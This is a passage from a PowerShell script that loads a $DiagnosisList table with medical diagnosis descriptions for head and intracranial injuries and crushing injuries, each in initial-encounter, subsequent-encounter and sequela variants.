injury before regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of any duration with death due to other cause before regaining consciousness","Traumatic subdural hemorrhage with loss of consciousness of any duration with death due to other cause before regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of unspecified duration","Traumatic subdural hemorrhage with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of unspecified duration","Traumatic subdural hemorrhage with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subdural hemorrhage with loss of consciousness of unspecified duration","Traumatic subdural hemorrhage with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage without loss of consciousness","Traumatic subarachnoid hemorrhage without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage without loss of consciousness","Traumatic subarachnoid hemorrhage without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage without loss of consciousness","Traumatic subarachnoid hemorrhage without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of 30 minutes or less","Traumatic subarachnoid hemorrhage with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of 30 minutes or less","Traumatic subarachnoid hemorrhage with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of 30 minutes or less","Traumatic subarachnoid hemorrhage with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of 31 minutes to 59 minutes","Traumatic subarachnoid hemorrhage with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of 31 minutes to 59 minutes","Traumatic subarachnoid hemorrhage with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of 31 minutes to 59 minutes","Traumatic subarachnoid hemorrhage with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes","Traumatic subarachnoid hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes","Traumatic subarachnoid hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes","Traumatic subarachnoid hemorrhage with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of 6 hours to 24 hours","Traumatic subarachnoid hemorrhage with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of 6 hours to 24 hours","Traumatic subarachnoid hemorrhage with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of 6 hours to 24 hours","Traumatic subarachnoid hemorrhage with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic subarachnoid hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic subarachnoid hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic subarachnoid hemorrhage with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic subarachnoid hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic subarachnoid hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic subarachnoid hemorrhage with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Traumatic subarachnoid hemorrhage with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Traumatic subarachnoid hemorrhage with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of unspecified duration","Traumatic subarachnoid hemorrhage with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of unspecified duration","Traumatic subarachnoid hemorrhage with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subarachnoid hemorrhage with loss of consciousness of unspecified duration","Traumatic subarachnoid hemorrhage with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified without loss of consciousness","Injury of right internal carotid artery, intracranial portion, not elsewhere classified without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified without loss of consciousness","Injury of right internal carotid artery, intracranial portion, not elsewhere classified without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified without loss of consciousness","Injury of right internal carotid artery, intracranial portion, not elsewhere classified without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 30 minutes or less","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 30 minutes or less","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 30 minutes or less","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 31 minutes to 59 minutes","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 31 minutes to 59 minutes","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 31 minutes to 59 minutes","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 1 hour to 5 hours 59 minutes","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 1 hour to 5 hours 59 minutes","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 1 hour to 5 hours 59 minutes","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 6 hours to 24 hours","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 6 hours to 24 hours","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 6 hours to 24 hours","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of unspecified duration","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of unspecified duration","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of unspecified duration","Injury of right internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified without loss of consciousness","Injury of left internal carotid artery, intracranial portion, not elsewhere classified without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified without loss of consciousness","Injury of left internal carotid artery, intracranial portion, not elsewhere classified without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified without loss of consciousness","Injury of left internal carotid artery, intracranial portion, not elsewhere classified without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 30 minutes or less","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 30 minutes or less","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 30 minutes or less","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 31 minutes to 59 minutes","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 31 minutes to 59 minutes","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 31 minutes to 59 minutes","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 1 hour to 5 hours 59 minutes","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 1 hour to 5 hours 59 minutes","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 1 hour to 5 hours 59 minutes","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 6 hours to 24 hours","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 6 hours to 24 hours","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 6 hours to 24 hours","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of unspecified duration","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of unspecified duration","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of unspecified duration","Injury of left internal carotid artery, intracranial portion, not elsewhere classified with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury without loss of consciousness","Other specified intracranial injury without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury without loss of consciousness","Other specified intracranial injury without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury without loss of consciousness","Other specified intracranial injury without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of 30 minutes or less","Other specified intracranial injury with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of 30 minutes or less","Other specified intracranial injury with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of 30 minutes or less","Other specified intracranial injury with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of 31 minutes to 59 minutes","Other specified intracranial injury with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of 31 minutes to 59 minutes","Other specified intracranial injury with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of 31 minutes to 59 minutes","Other specified intracranial injury with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of 1 hour to 5 hours 59 minutes","Other specified intracranial injury with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of 1 hour to 5 hours 59 minutes","Other specified intracranial injury with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of 1 hour to 5 hours 59 minutes","Other specified intracranial injury with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of 6 hours to 24 hours","Other specified intracranial injury with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of 6 hours to 24 hours","Other specified intracranial injury with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of 6 hours to 24 hours","Other specified intracranial injury with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Other specified intracranial injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Other specified intracranial injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Other specified intracranial injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Other specified intracranial injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Other specified intracranial injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Other specified intracranial injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Other specified intracranial injury with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Other specified intracranial injury with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of unspecified duration","Other specified intracranial injury with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of unspecified duration","Other specified intracranial injury with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified intracranial injury with loss of consciousness of unspecified duration","Other specified intracranial injury with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury without loss of consciousness","Unspecified intracranial injury without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury without loss of consciousness","Unspecified intracranial injury without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury without loss of consciousness","Unspecified intracranial injury without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of 30 minutes or less","Unspecified intracranial injury with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of 30 minutes or less","Unspecified intracranial injury with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of 30 minutes or less","Unspecified intracranial injury with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of 31 minutes to 59 minutes","Unspecified intracranial injury with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of 31 minutes to 59 minutes","Unspecified intracranial injury with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of 31 minutes to 59 minutes","Unspecified intracranial injury with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of 1 hour to 5 hours 59 minutes","Unspecified intracranial injury with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of 1 hour to 5 hours 59 minutes","Unspecified intracranial injury with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of 1 hour to 5 hours 59 minutes","Unspecified intracranial injury with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of 6 hours to 24 hours","Unspecified intracranial injury with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of 6 hours to 24 hours","Unspecified intracranial injury with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of 6 hours to 24 hours","Unspecified intracranial injury with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Unspecified intracranial injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Unspecified intracranial injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Unspecified intracranial injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Unspecified intracranial injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Unspecified intracranial injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Unspecified intracranial injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Unspecified intracranial injury with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Unspecified intracranial injury with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of unspecified duration","Unspecified intracranial injury with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of unspecified duration","Unspecified intracranial injury with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified intracranial injury with loss of consciousness of unspecified duration","Unspecified intracranial injury with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of face","Crushing injury of face, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of face","Crushing injury of face, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of face","Crushing injury of face, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of skull","Crushing injury of skull, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of skull","Crushing injury of skull, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of skull","Crushing injury of skull, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of other parts of head","Crushing injury of other parts of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of other parts of head","Crushing injury of other parts of head, subsequent encounter") + $null = 